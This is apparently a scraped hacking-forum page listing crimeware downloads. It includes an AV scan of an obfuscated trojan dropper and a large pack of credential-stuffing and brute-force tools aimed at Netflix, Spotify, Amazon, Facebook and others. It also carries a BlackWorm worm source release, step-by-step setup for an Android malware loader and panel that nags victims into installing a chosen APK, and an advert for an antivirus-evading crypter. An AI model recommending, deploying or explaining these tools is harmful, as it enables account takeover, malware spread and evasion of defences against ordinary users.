    File Name: uyuy.exe Scan Date: 09-11-2018 11:59:16 Detected by: 8/30 MD5: 4255ef395cb6241332b16c73c2f4f881 Checked by AntiScan.Me [Hidden Content] adaware: Gen:Variant.Ursu.239764 ahnlab: Clean alyac: Clean avast: Clean avg: Clean avira: TR/Dropper.Gen bitdef: Gen:Variant.Ursu.239764 bullguard: Gen:Variant.Ursu.239764 clam: Clean comodo: Clean drweb: Trojan.VbCrypt.68 emsisoft: Clean nod32: a variant of Win32/Injector.BNZ trojan fortinet: Clean fsec: Gen:Variant.Ursu.239764 ikarus: Virus.Win32.VBInject kasper: Clean mcafeetp: Clean mbytes: Clean pandagp: Clean sophos: Clean trend: Clean webroot: Clean mssec: Clean zonealarm: Clean zillya: Clean Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  46. 9 points
    This pack contains a colllection of tools(Account Checker, Combo maker, proxy grabber and more...). All files were analyzed, however for greater security it is recommended to use a Sandbox. TOOLS CHECKERS: All Mail Checker All-In-One-Checker CRACKED beinsportsconnect.fr By DarkneS's bonusbitcoin.co [b&C] by ALEEEK v.2[.ru] Brute&Checker Vk.com[API] by Vladimir Private v1.1 BuPlay - Best Uplay Checker v1.0.1 CoinBase brute & checker by invincible334 ComPleX Edition v1.6.8[Cracked by termita] CW Spotify Account Checker Email Checker by Sinus 1.4 Gearbest Account Checker Instagram OG Checker v1 LOL Account Checker 7.5 LoLAccountChecker NetFlix BruteForce & Checker v0.1 Newage-bank Checker By RubiconT NFL checker by RubiconT Origin Games Checker PSN Checker Social Club checker v2 Spotify Account Checker by Imfamous Spotify Accounts Checker Spotify Checker (Proxyless) by UTC Steam Login Checker by VANS - LowSkill Store NBA Checker by Orenburg Udemy Checker by RubiconT Universe-Amazon Email Checker by Trinity uPlay B&C by Vu4ik a.k MrVampire uPlay Brute Checker by Draingrom Uplay Brute&Checker v2.2 by genz - [Cracked By egorea1999] uPlay BruteChecker v1.0 Uplay Software Hangover -[Cracked by PC-RET] VTO.pe Brute Checker by Pr@jz Warface Checker soft by Vu4ik WordPRess Account Checker by X-LAYER WorldOfTanks Mail Checker Euro Edition Zenmate Cracker by MrPrinceX ACCOUNT CRACKER: AccountReaper v1.3.0 Amazon Brute Checker by Cracking-VIP.Net Amazon Cracker AmazonVersion [Cracked By PC-RET] Ebay Brute by Sft-Software[Translated xName] eBay BruteChecker v2 eBay BruteChecker eBay Software by CT-SFT - Cracked by [#PCR#] EggCrack[source + Bin] Facebook Brute force Facebook Brute&Checker by ilya2012 FirstGamePortal BruteChecker by Moody Gmail BruteForce develop by Gratsh Instagram Brute By Draingrom Instagram Cracker + Bot DEVIL Mails Brute[Private Edition] - Cracked By [#PCR#] Mega.nz Cracker Netflix B&C by GOD NetFlix BruteForce&Checker v0.1 fresh_lik Netflix Cracker Coded By EVG Netflix.com Bruteforce and Checker by Yung Origin B&C By GameRocs Source Origin Brute-Checker by Lomster Origin by ColorPage PRAGMAtic Prospero.ru Brute & Checker RPD Cracker Cracked Sentry MBA 1.4.1 Sentry MBA 1.4.2 Sentry_MBA 1.4.1 Multi Patched by The Old Warrior Spotify Cracker V3 Coded By MOH3EN Tutux BruteForce & Checekr by Lagger Uber Soft 1.4 Valid Email BruteChecker 1.1 by thekorol WWE Cracker Coded by Mr.Genius Zenmate Cracker-Checker by Calix PROXY TOOLS: All Proxy Checker Coded by ^Vindeta^ Gather Proxy 8.9 powered by Gatherproxy.com HQ Proxy Leecher v0.1 by XLAY3R IP Proxy Scraper by Daapii Links Proxie.txt Net Ghost v1.5[Grabber-Scraper-Checker] by Arcanecfg NetScraper CRACKED BY LphT Parser Proxy by Coco jambo ProxyGrabber by mrdavid555 1.0 Tesla Proxy Scraper v1.0 Total Proxy Leecher v0.1[by X-SLAYER] Universal Proxy Software vProxy v1.4 by Yani vProxyScraper æProxy Tool v1.6 by Nikola Tesla COMBO MAKERS: All URL Grabber [Coded By SyBeR] Combo utilitiesV1.8 Email - User Email Combo Leecher [Coded By SyBeR] League of Legends Combo Cleaner Mailist & Combo SLAYER v0.1 morCrawler 0.4.1 Pastebin SLAYER v0.1 by X-SLAYER Pastebin.com D3vSpider v1.41 - Coded by D3vil SLAYER Leecher v0.2 TOOLS: DeathCaptcha v1 by Hangover Dork Searcher EZ Dorker - Dork Maker DorkGen Cracked by Calix Elite Duplicates Remover v1.5 By Vex Gorker Private - Black Edition Lol Scrappler Beta Lol.Boosted Scraper Online Reverse Hash Tool v3.3 Simple SQLi DOrk Scanner by RieqyNS13 SLAYER Leecher v0.2 SLC Scraper v2 by killerabgg SQLi ask v.8.0 SQLi Dorks Generator By The N3RoX SQLi Dumper 8.2 + Keygen SQLi Dumper v.7 producer by fLaSh SQLi Dumper v.8.5 Cracked by LautheKing! Steam Username Scraper [Coded By Syber] Url Parser Version 2.1 by J0hnD03 Work With Dorks [DORK's Generator] By JohnDoe v.2.1 Screenshots Download File: [HIDE-THANKS][Hidden Content]] Password: [Hidden Content] PD: Compress with RAR5
  47. 8 points
    BlackWorm Developer Stopped Updating The Software This is the Last Version Black.Hacker and DarkSoftwareCo Will Release If You Have Any Issues Please Read The Sourcecode and Try to Solve it What's New : Name: BlackWorm v6.0 Black Ninja Version: 6.0 Function: Create a worm spread Working Platform: Vb.Net Framwork 4 Code Source before development: njQ8 Developer: Black.Hacker Last Update : Jan 1, 2019 Download Source Code: [hide][Hidden Content]]
  48. 8 points
    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  49. 8 points
    android loader installation guide 20/11/17 Server requirements: - OS debian 7.0 or newer - RAM 2 Gb or more - apache 2 - php 5 - mysql 1. bot Open folder 'bot' in Android studio 2.0 or higher Set correct server ip or domain in bot/app/src/main/java/task/loader/Constants.java Build apk 2. panel Upload panel to the server Setup apache with panel/apache_loader.conf Create mysql database named 'loader' and import panel/db_loader.sql Set mysql access data in panel/db.php Copy panel/video/aapt/libc++.so to /usr/lib/ Setup basic auth in panel/video/.htaccess: htpasswd -cb /var/data/loader.passwd USER PASSWORD make panel/tmp writeable 3. usage - install loader on the phone - open panel with default login 'admin' and password '123123' - bot should appear in 'Bots' section - upload target apk (that should be installed by loader) to any host - create new task in Loader panel, set direct url to apk - set number of attemps - how much times loader will propose user to install the target apk - make task 'active' - make sure loader is installed on your device, disable screen - enable screen again - loader will propose you to install the target apk - it will propose user to install every 20 seconds once it will be done Optionally you can show landing page first, set url of the landing in the task settings Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  50. 8 points
    ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Один из лучших Crypter, который живёт уже на протяжении года, и по сей день он является FUD ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Сканы: ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- PASS RAR: RC4(xakfor.net) [ XadmWa ] minus MEGAN-35 [ Td/q ] = CAESAR (RC4 minus MEGAN) [ xklkfjrp ] -----> ROT13

Important Information

Terms of Service